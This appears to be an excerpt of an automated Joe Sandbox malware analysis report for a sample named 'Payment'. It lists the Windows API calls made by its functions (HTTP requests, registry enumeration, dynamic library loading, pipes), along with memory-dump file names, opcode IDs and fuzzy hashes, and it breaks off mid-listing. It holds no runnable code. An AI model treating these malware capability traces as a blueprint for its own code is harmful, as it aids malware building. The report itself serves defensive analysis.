                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2DAC5
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B2DAFB
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B2DB0C
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B2DB8E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 0e1a392400fba61075da5a48dc1017a084ed34c55dbd605440480b2a59106a67
                                                          • Instruction ID: cf4e5664a7b7a2c272357f8b317b31d29b54af0d49946d5e55fad7a9731edff8
                                                          • Opcode Fuzzy Hash: 0e1a392400fba61075da5a48dc1017a084ed34c55dbd605440480b2a59106a67
                                                          • Instruction Fuzzy Hash: 6A418FB1600218EFDB15CF64D888BAABBE9EF48310F1580E9AD09DF255D7B1D940CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B32CAF
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B32CCB
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00B32D11
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B96890,00000000), ref: 00B32D5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 7ef732d99f518e45bc242625bcede9d0e9795e12871aeccdd28437d51a760243
                                                          • Instruction ID: aa298e65e8b31f54e786baa9aef71cd37c3e3119448ffa37ad077f5236738b3e
                                                          • Opcode Fuzzy Hash: 7ef732d99f518e45bc242625bcede9d0e9795e12871aeccdd28437d51a760243
                                                          • Instruction Fuzzy Hash: E84184712043029FDB24DF28D885B5BB7E4FF85720F2446AEF96597291DB70E904CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B4DAD9
                                                            • Part of subcall function 00AD79AB: _memmove.LIBCMT ref: 00AD79F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 7d94ed6ff21a61aaf8108e169c212f7a364ab5ad51bdeeaf52b44345e77866ca
                                                          • Instruction ID: 5eb9ccabba1008f1f6ed19c0bbbef0730821fdbda9095bdb73eb7635811948c1
                                                          • Opcode Fuzzy Hash: 7d94ed6ff21a61aaf8108e169c212f7a364ab5ad51bdeeaf52b44345e77866ca
                                                          • Instruction Fuzzy Hash: 9531657150061A9FCF14EF64C9819BEB3F4FF05710B1086AAE876A77A1DB71AA05DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B293F6
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B29409
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B29439
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 7f0e86d0ed8584a6b4e9648441e535f46954b76b1a54d78b641b1251fb6662f9
                                                          • Instruction ID: e36b4f014d6d401f5f2b52cca99b42dccd0871d71fccbd164e43fb4e79ef130c
                                                          • Opcode Fuzzy Hash: 7f0e86d0ed8584a6b4e9648441e535f46954b76b1a54d78b641b1251fb6662f9
                                                          • Instruction Fuzzy Hash: F2219471900214BADB28ABB4EC85DFFB7A8DF45350F1441AAF92A972E1DF35490AD610
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B41B40
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B41B66
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B41B96
                                                          • InternetCloseHandle.WININET(00000000), ref: 00B41BDD
                                                            • Part of subcall function 00B42777: GetLastError.KERNEL32(?,?,00B41B0B,00000000,00000000,00000001), ref: 00B4278C
                                                            • Part of subcall function 00B42777: SetEvent.KERNEL32(?,?,00B41B0B,00000000,00000000,00000001), ref: 00B427A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: e23a8db9cfdea0457d386e4b8bdfd6c1513578e2da2b1040aad0d165ef9c5bb8
                                                          • Instruction ID: 40054dd1f52ffa5d47f130bf7da8cdddfb6e857eb10b93b7bca902554732f397
                                                          • Opcode Fuzzy Hash: e23a8db9cfdea0457d386e4b8bdfd6c1513578e2da2b1040aad0d165ef9c5bb8
                                                          • Instruction Fuzzy Hash: 82219FB1900308BFEB119F689CC5EBF76ECEB49744F1045AAF545A7240EB209E45A761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AD1D73
                                                            • Part of subcall function 00AD1D35: GetStockObject.GDI32(00000011), ref: 00AD1D87
                                                            • Part of subcall function 00AD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AD1D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B566D0
                                                          • LoadLibraryW.KERNEL32(?), ref: 00B566D7
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B566EC
                                                          • DestroyWindow.USER32(?), ref: 00B566F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: af77a6411191a64264c5fe87d5d4aa26c144519f2eb7cde8394bd78a2837eb7a
                                                          • Instruction ID: 21eb3bab3268f6112ca6013f8b41f97a6e59eb493b16554bc69cabf39d9d2c75
                                                          • Opcode Fuzzy Hash: af77a6411191a64264c5fe87d5d4aa26c144519f2eb7cde8394bd78a2837eb7a
                                                          • Instruction Fuzzy Hash: DD21CD71200206ABEF108F64EC80FBB77EDEB1932AF9002A9FD11931A0CB71CC459B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B3705E
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B37091
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B370A3
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B370DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 03f6f7b1b6636da755d4fa3230d9deac4eb48a95bea0c2ccc178989d5379f691
                                                          • Instruction ID: 87574477f53eae5aa568c81d2483ed917e77914089739b52a6ffe9408542586f
                                                          • Opcode Fuzzy Hash: 03f6f7b1b6636da755d4fa3230d9deac4eb48a95bea0c2ccc178989d5379f691
                                                          • Instruction Fuzzy Hash: BA214FB454430AABDB349F68D845A9AB7E8EF44720F304699F8A1D72D0DF7198508B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B3712B
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B3715D
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B3716E
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B371A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: a743c05476c9f5d93da59fff510913f415a948b809c7477a7d96c15119cb1a64
                                                          • Instruction ID: 1de84d56c2bd2f95ebbd217a12f8909bb043485b3d14601e90b0f1760d99f8b9
                                                          • Opcode Fuzzy Hash: a743c05476c9f5d93da59fff510913f415a948b809c7477a7d96c15119cb1a64
                                                          • Instruction Fuzzy Hash: A821A4B6544706ABDB309F689C44BAAB7E8EF55720F300699FCA0E72D0DF709841CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B3AEBF
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B3AF13
                                                          • __swprintf.LIBCMT ref: 00B3AF2C
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B5F910), ref: 00B3AF6A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 3ff7fb1c8b0615cc8244d9f8e4a7909eb7198f1d22c863a6102a377d378400b8
                                                          • Instruction ID: 430ef29ca3de88f00e19510e82aefae45691d617a3130dec589a4b758ac2b58f
                                                          • Opcode Fuzzy Hash: 3ff7fb1c8b0615cc8244d9f8e4a7909eb7198f1d22c863a6102a377d378400b8
                                                          • Instruction Fuzzy Hash: CA214731600209AFCB10EF54C985EAEBBF8EF49704B1040A9F905E7361DB71EA45CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                            • Part of subcall function 00B2A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B2A399
                                                            • Part of subcall function 00B2A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B2A3AC
                                                            • Part of subcall function 00B2A37C: GetCurrentThreadId.KERNEL32 ref: 00B2A3B3
                                                            • Part of subcall function 00B2A37C: AttachThreadInput.USER32(00000000), ref: 00B2A3BA
                                                          • GetFocus.USER32 ref: 00B2A554
                                                            • Part of subcall function 00B2A3C5: GetParent.USER32(?), ref: 00B2A3D3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B2A59D
                                                          • EnumChildWindows.USER32(?,00B2A615), ref: 00B2A5C5
                                                          • __swprintf.LIBCMT ref: 00B2A5DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: 04f3d15e19e202522d6510132c84077c3977540a60cdc8d094552dc904e71842
                                                          • Instruction ID: 1cb0b3f5bc8df7d1f637b2c3bbf48eb0d5f9d1949fb8a5937d579d0ebf95bd17
                                                          • Opcode Fuzzy Hash: 04f3d15e19e202522d6510132c84077c3977540a60cdc8d094552dc904e71842
                                                          • Instruction Fuzzy Hash: FA11AF71600219ABDF11BF60EC85FFA77B9AF48701F0440F6B90CAA152DB7459458B75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00B32048
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 95922dcd3fb4e87d215ef2f231a77ff7693eebce71166a70098ee0659f2b4ca3
                                                          • Instruction ID: b1616a6a5c619e75a82a13a389abb43883ddcde3a8dfd3cd06b50b145f358c9f
                                                          • Opcode Fuzzy Hash: 95922dcd3fb4e87d215ef2f231a77ff7693eebce71166a70098ee0659f2b4ca3
                                                          • Instruction Fuzzy Hash: 6C115E319001098FCF14EFA4D9919FEB7F4FF16304F1084A9E95567262EB32590ACB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B4EF1B
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B4EF4B
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B4F07E
                                                          • CloseHandle.KERNEL32(?), ref: 00B4F0FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 65f083f5ec7ad91d8c6e8140bebf290ba8232a8220004bc46340d9a0f6055d74
                                                          • Instruction ID: 1f4c3db1639fff9804cd92348b2c3ec9973332d8f33d16f19dbb6786cf09886f
                                                          • Opcode Fuzzy Hash: 65f083f5ec7ad91d8c6e8140bebf290ba8232a8220004bc46340d9a0f6055d74
                                                          • Instruction Fuzzy Hash: 6C813E716043119FE720EF28C986B2AB7E5EF88710F14885EF59ADB392DB70ED418B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B50038,?,?), ref: 00B510BC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B50388
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B503C7
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B5040E
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00B5043A
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B50447
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 952d498c48278b6a26e143dd098444ac38fe8771ef7a1b369b36565b48355c1d
                                                          • Instruction ID: 02150745aa6a5350a17c2d971286d8995df643d0d4c333b7edb30babb844576b
                                                          • Opcode Fuzzy Hash: 952d498c48278b6a26e143dd098444ac38fe8771ef7a1b369b36565b48355c1d
                                                          • Instruction Fuzzy Hash: 6F514E31114205AFD704EF64D981F6EB7E8FF88305F04899EB996872A1DB30E908CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B4DC3B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B4DCBE
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B4DCDA
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B4DD1B
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B4DD35
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B37B20,?,?,00000000), ref: 00AD5B8C
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B37B20,?,?,00000000,?,?), ref: 00AD5BB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: cbc6bba0d189d20aab463833b7d268cb2ad78e3e96626efdacf7e1a5dc026d97
                                                          • Instruction ID: 3af537bff542ce901cef5afd92a1e72c1e0ba9d6bdccba73bdf23bbdc727380c
                                                          • Opcode Fuzzy Hash: cbc6bba0d189d20aab463833b7d268cb2ad78e3e96626efdacf7e1a5dc026d97
                                                          • Instruction Fuzzy Hash: 2A511A35A00615EFCB00EF68C5849ADB7F4FF59310B1480AAE816AB322DB30EE45DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B3E88A
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B3E8B3
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B3E8F2
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B3E917
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B3E91F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
